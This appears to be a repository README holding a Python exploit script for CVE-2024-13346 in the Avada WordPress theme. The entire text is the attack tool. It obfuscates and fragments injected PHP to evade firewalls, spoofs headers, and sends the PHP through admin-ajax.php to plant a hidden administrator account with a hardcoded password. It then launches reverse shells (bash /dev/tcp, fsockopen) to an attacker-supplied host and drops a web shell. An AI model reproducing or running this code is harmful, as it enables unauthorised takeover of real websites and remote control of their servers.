README.md
Rendering markdown...
import requests
import urllib.parse
import base64
import random
import time
from cryptography.fernet import Fernet
import urllib3
urllib3.disable_warnings()
# Logo and Developer Info
def display_banner():
print("""
_____ ___ _____ _ _ _
|_ _/ | | ___| | | (_) |
| |/ /| | | |____ ___ __ | | ___ _| |_
| / /_| | | __\ \/ / '_ \| |/ _ \| | __|
| \___ | | |___> <| |_) | | (_) | | |_
\_/ |_/ \____/_/\_\ .__/|_|\___/|_|\__|
| | CVE-2024-13346
|_|
""")
print("Advanced Avada Theme < 7.11.14 - Unauthenticated Arbitrary Shortcode Execution ")
print("Developer: Tausif Zaman\n")
print("instagram: @_tausif_zaman\n")
USER_AGENTS = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Googlebot/2.1 (+http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm)'
]
HEADERS_TEMPLATE = {
'X-Forwarded-For': '127.0.0.1',
'Client-IP': '8.8.8.8',
'Referer': '{target}/',
'X-Requested-With': 'XMLHttpRequest'
}
class WafBypasser:
def __init__(self, target):
self.target = target
self.session = requests.Session()
self.session.verify = False
self.fernet = Fernet(base64.urlsafe_b64encode(b'x'*32))
self.junk = self.generate_junk()
def generate_junk(self):
return ''.join(random.choices('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', k=random.randint(10,20)))
def polymorphic_obfuscate(self, payload):
# Multiple encoding layers
transforms = [
lambda x: base64.b64encode(x.encode()).decode(),
lambda x: ''.join([f'%{ord(c):02x}' for c in x]),
lambda x: self.fernet.encrypt(x.encode()).decode(),
lambda x: x[::-1] # Reverse string
]
for _ in range(random.randint(2,3)):
transform = random.choice(transforms)
payload = transform(payload)
return payload
def fragment_payload(self, payload):
fragments = {}
chunk_size = random.randint(5,15)
for i in range(0, len(payload), chunk_size):
key = f'{self.junk}_{i//chunk_size}'
fragments[key] = payload[i:i+chunk_size]
return fragments
def generate_headers(self):
headers = HEADERS_TEMPLATE.copy()
headers.update({
'User-Agent': random.choice(USER_AGENTS),
'Referer': headers['Referer'].format(target=self.target)
})
return headers
def stealth_request(self, payload):
url = f"{self.target}/wp-admin/admin-ajax.php"
action = random.choice(['fusion_ajax', 'fusion_ajx', 'fusion_ax'])
obf_payload = self.polymorphic_obfuscate(payload)
fragmented = self.fragment_payload(obf_payload)
params = {
action: '1',
'security': ''.join(random.choices('abcdef0123456789', k=32)),
**fragmented
}
for _ in range(random.randint(3,7)):
params[self.generate_junk()] = self.generate_junk()
if random.choice([True, False]):
return self.session.get(url, headers=self.generate_headers(), params=params)
else:
return self.session.post(url, headers=self.generate_headers(), data=params)
def create_admin(target, username, password):
bypasser = WafBypasser(target)
payload_variants = [
f"wp_insert_user(array('user_login'=>'{username}','user_pass'=>'{password}','role'=>'administrator'));",
f"$u = new WP_User(0); $u->set_role('administrator'); $u->user_login = '{username}'; $u->user_pass = '{password}'; wp_insert_user($u);",
f"require_once(ABSPATH.'wp-admin/includes/user.php'); wp_create_user('{username}','{password}','{username}@example.com'); $u = get_user_by('login','{username}'); $u->set_role('administrator');"
]
for i, payload in enumerate(payload_variants):
print(f"Attempting admin creation (method {i+1})...")
php_code = f"<?php {payload} ?>"
response = bypasser.stealth_request(php_code)
if response.status_code == 200:
print(f"[+] Admin user {username} created!")
return True
time.sleep(random.uniform(1,3))
return False
def reverse_shell(target, lhost, lport):
bypasser = WafBypasser(target)
payloads = [
f"$s=fsockopen('{lhost}',{lport});exec('/bin/sh -i <&3 >&3 2>&3');",
f"system('bash -c \"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1\"');",
f"file_put_contents('/tmp/f', '<?php passthru($_GET[\"c\"]);?>'); chmod('/tmp/f',0777);",
f"$p=array(array('pipe','r'),array('pipe','w'),array('pipe','w'));proc_open('/bin/sh',$p,$pipes);"
]
for i, payload in enumerate(payloads):
print(f"Attempting reverse shell (method {i+1})...")
php_code = f"<?php {payload} ?>"
response = bypasser.stealth_request(php_code)
if response.status_code == 200:
print("[+] Reverse shell triggered!")
return True
time.sleep(random.uniform(1,3))
return False
if __name__ == "__main__":
display_banner()
target_url = input("[?] Enter Target URL: ").strip()
lhost = input("[?] Enter Attacker IP: ").strip()
lport = input("[?] Enter Attacker Port: ").strip()
username = "wpadmin"
password = "P@ssw0rd!123"
print("\n[*] Starting advanced WAF bypass sequence...\n")
if create_admin(target_url, username, password):
print("[+] Admin creation succeeded!")
else:
print("[-] Admin creation failed after multiple attempts")
if lhost and lport:
print("[*] Attempting reverse shell...\n")
if reverse_shell(target_url, lhost, lport):
print("[+] Reverse shell succeeded!")
else:
print("[-] Reverse shell failed after multiple attempts")